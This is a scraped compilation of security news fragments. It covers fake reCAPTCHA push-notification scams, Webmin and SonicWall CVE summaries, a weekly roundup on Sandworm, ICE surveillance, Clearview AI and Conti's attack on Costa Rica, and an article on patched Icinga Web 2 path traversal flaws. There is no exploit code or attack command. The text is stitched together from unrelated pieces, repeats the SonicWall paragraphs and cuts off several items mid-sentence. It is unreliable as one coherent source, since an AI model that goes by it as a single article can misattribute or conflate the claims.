By design, push notifications work similarly across different operating systems and web browsers. They appear outside of the browser window just above the taskbar on the right hand side. This is misleading as they may seem to originate from the operating system. Knowing the difference between a web push notification and an alert that comes from the operating system or another program installed on the device is hard, and that makes it difficult for the unsuspecting user of an affected system to know what is going on.

As we reported in the past, adware, search hijackers, and PUP families have added push notifications as one of their attack vectors. Sucuri warns that it is also one of the most common ways attackers display “tech support” scams, where users are told their computer is infected or slow and they should call a toll-free number to fix the problem.

**Removal and mitigation**

Knowing that these fake reCAPTCHA sites exist and being able to spot the difference with a real one is your best protection. Also, many security programs, including Malwarebytes, will block access to the campaign’s domains.

If your system shows you push notifications, you can find detailed instructions on how to disable and remove permissions for browser push notifications in our article: Browser push notifications: a feature asking to be abused.

Website owners can use Sucuri’s free remote website scanner to detect the malware.

Stay safe, everyone!

_Special thanks to the Malwarebytes Threat Intelligence Tea_m _for their contribution and the screenshot_

Fake reCAPTCHA forms dupe users via compromised WordPress sites

Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.

CVE-2022-30708: Webmin

Plus: New details of ICE’s dragnet surveillance in the US, Clearview AI agrees to limit sales of its faceprint database, and more.

A group of human rights lawyers and investigators called on the Hague this week to bring what would be the first ever “cyber war crimes” charges. The group is urging the International Criminal Court to bring charges against the dangerous and destructive Russian hacking group known as Sandworm, which is run by Russia’s military intelligence agency GRU. Meanwhile, activists are working to block Russia from using satellites controlled by the French company Eutelsat to broadcast its state-run propaganda programming.

Researchers released findings this week that thousands of popular websites record data that users type into forms on the site before they hit the Submit button—even if the user closes the page without submitting anything. Google released a report on an in-depth security analysis it conducted with the chipmaker AMD to catch and fix flaws in specialty security processors used in Google Cloud infrastructure. The company also announced a slew of privacy and security features for its new Android 13 mobile operating system along with a vision for making them easier for people to understand and use.

The European Union is considering child protective legislation that would require scanning private chats, potentially undermining end-to-end encryption at a massive scale. Plus, defenders from the cybersecurity nonprofit BIO-ISAC are racing to protect the bioeconomy from digital threats, announcing a partnership this week with Johns Hopkins University Applied Physics Lab that will help fund pay-what-you-can incident response resources.

But wait, there’s more. Each week we round up the news that we didn’t break or cover in-depth. Click on the headlines to read the full stories. And stay safe out there.

The United States is completing development of a new generation of high-security encryption standards that will be robust in the current technical climate and are designed to be resistant to circumvention in the age of quantum computing. And while the National Security Agency contributed to the new standards' creation, the agency says it has no special means of undermining the protections. Rob Joyce, the NSA’s director of cybersecurity, told Bloomberg this week, “There are no backdoors." The NSA has been implicated in schemes to backdoor encryption before, including in a situation in the early 2010s in which the US removed an NSA-developed algorithm as a federal standard over backdoor concerns.

An extensive investigation by Georgetown Law’s Center on Privacy & Technology reveals a more detailed picture than ever of US Immigration and Customs Enforcement agency surveillance capabilities and practices. According to the report, published this week, ICE began developing its surveillance infrastructure at the end of the George W. Bush administration, years before it was previously thought to have begun these efforts. And researchers found that ICE spent $2.8 billion on surveillance technology, including face recognition, between 2008 and 2021. ICE was already known for its aggressive and invasive surveillance tactics during the Donald Trump administration’s anti-immigration crackdowns, but the report also argues that ICE has “played a key role in the federal government’s larger push to amass as much information as possible” about people in the United States.

“Our two-year investigation, including hundreds of Freedom of Information Act requests and a comprehensive review of ICE’s contracting and procurement records, reveals that ICE now operates as a domestic surveillance agency,” the report says. “By reaching into the digital records of state and local governments and buying databases with billions of data points from private companies, ICE has created a surveillance infrastructure that enables it to pull detailed dossiers on nearly anyone, seemingly at any time.”

In a legal settlement this week, the face recognition and surveillance startup Clearview AI agreed to a set of restrictions on its business in the US, including that it won’t sell its faceprint database to businesses or individuals in the country. The company says it has more than 10 billion faceprints in its arsenal belonging to people around the world and collected through photos found online. The settlement comes after the American Civil Liberties Union accused Clearview of violating the Illinois Biometric Information Privacy Act. The agreement also stipulates that the company won’t be allowed to sell access to its database in Illinois for five years. “This settlement demonstrates that strong privacy laws can provide real protections against abuse,” Nathan Freed Wessler, a deputy director of the ACLU Speech, Privacy, and Technology Project said in a statement. Despite the privacy win, Clearview may continue to sell its services to federal law enforcement, including ICE, and police departments outside of Illinois.

Costa Rican president Rodrigo Chaves said on Sunday that the country was declaring a national emergency after the notorious Conti ransomware gang infected multiple government agencies with malware last week. Sunday was the first day of Chaves' presidency. Conti leaked some of a 672 GB trove of stolen data from multiple Costa Rican agencies. In April, the Costa Rican social security administration had announced that it was the victim of a Conti attack. “At this time, a perimeter security review is being carried out on the Conti Ransomware, to verify and prevent possible attacks," the agency tweeted at the time.

The NSA Swears It Has ‘No Backdoors’ in Next-Gen Encryption

SonicWall has published an advisory warning of a trio of security flaws in its Secure Mobile Access (SMA) 1000 appliances, including a high-severity authentication bypass vulnerability.
The weaknesses in question impact SMA 6200, 6210, 7200, 7210, 8000v running firmware versions 12.4.0 and 12.4.1. The list of vulnerabilities is below -

CVE-2022-22282 (CVSS score: 8.2) - Unauthenticated Access

SonicWall has published an advisory warning of a trio of security flaws in its Secure Mobile Access (SMA) 1000 appliances, including a high-severity authentication bypass vulnerability.

The weaknesses in question impact SMA 6200, 6210, 7200, 7210, 8000v running firmware versions 12.4.0 and 12.4.1. The list of vulnerabilities is below -

*   **CVE-2022-22282** (CVSS score: 8.2) - Unauthenticated Access Control Bypass
*   **CVE-2022-1702** (CVSS score: 6.1) - URL redirection to an untrusted site (open redirection)
*   **CVE-2022-1701** (CVSS score: 5.7) - Use of a shared and hard-coded cryptographic key

Successful exploitation of the aforementioned bugs could allow an attacker to unauthorized access to internal resources and even redirect potential victims to malicious websites.

Tom Wyatt of the Mimecast Offensive Security Team has been credited with discovering and reporting the vulnerabilities.

SonicWall noted that the flaws do not affect SMA 1000 series running versions earlier than 12.4.0, SMA 100 series, Central Management Servers (CMS), and remote access clients.

Although there is no evidence that these vulnerabilities are being exploited in the wild, it's recommended that users apply the fixes in the light of the fact that SonicWall appliances have presented an attractive bullseye in the past for ransomware attacks.

"There are no temporary mitigations," the network security company said. "SonicWall urges impacted customers to implement applicable patches as soon as possible."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

SonicWall Releases Patches for New Flaws Affecting SSLVPN SMA1000 Devices

A buffer overflow vulnerability in the SonicWall SSL-VPN NetExtender Windows Client (32 and 64 bit) in 10.2.322 and earlier versions, allows an attacker to potentially execute arbitrary code in the host windows operating system.

CVE-2022-22281

Open source IT monitoring system gets patched

John Leyden 13 May 2022 at 13:49 UTC

Open source IT monitoring system gets patched

A pair of vulnerabilities in the web control panel of IT monitoring system Icinga created a route for even unauthenticated attackers to run arbitrary PHP code and hijack systems.

The recent resolved web-related vulnerabilities – which were both discovered by security researchers at SonarSource – involved two path traversal vulnerabilities and a flaw that makes it possible to execute arbitrary PHP code from the administrator interface.

**Path to exploitation**

CVE-2022-24716 is a path traversal bug in Icinga Web 2 and CVE-2022-24715 is a separate path traversal bug that also exploits behaviour of PHP validating a SSH key by using a NULL byte. The PHP vulnerability is in the OpenSSL core extension.

These various vulnerabilities can readily be chained together to compromise a server, SonarSource warns.

Patches have been released and updates to Icinga Web versions 2.8.6, 2.9.6 and 2.10 are recommended. Users are advised to update their installation as well as rotating credentials as an additional precaution.

Catch up on the latest cybersecurity research news

Icinga offers an open source IT monitoring system that comes with various plugins and can be used to monitor network traffic, disk space, or services running on monitored hosts.

The vulnerabilities stem from coding flaws in the web control panel for the technology, which is known as Icinga Web 2.

**Rich pickings**

The path traversal vulnerability meant that attackers could potentially access the contents of and local system files accessible to the web server user, including icingaweb2 configuration files with database credentials.

The CVE-2022-24715 vulnerability can result in the execution of arbitrary PHP code from the administration interface

As explained in a technical blog post by SonarSource this week, the two flaws can “easily \[be\] chained \[together\] to compromise the server from an unauthenticated position if the attacker can reach the database by first disclosing configuration files and modifying the administrator's password”.

The Daily Swig asked SonarSource whether or not the vulnerabilities might have been abused in the wild, as well as what lessons its findings offered to other software developers.

No word back as yet but we’ll update this story as and when more information comes to hand.

RECOMMENDED Researcher stops REvil ransomware in its tracks with DLL-hijacking exploit

Tag

#ssl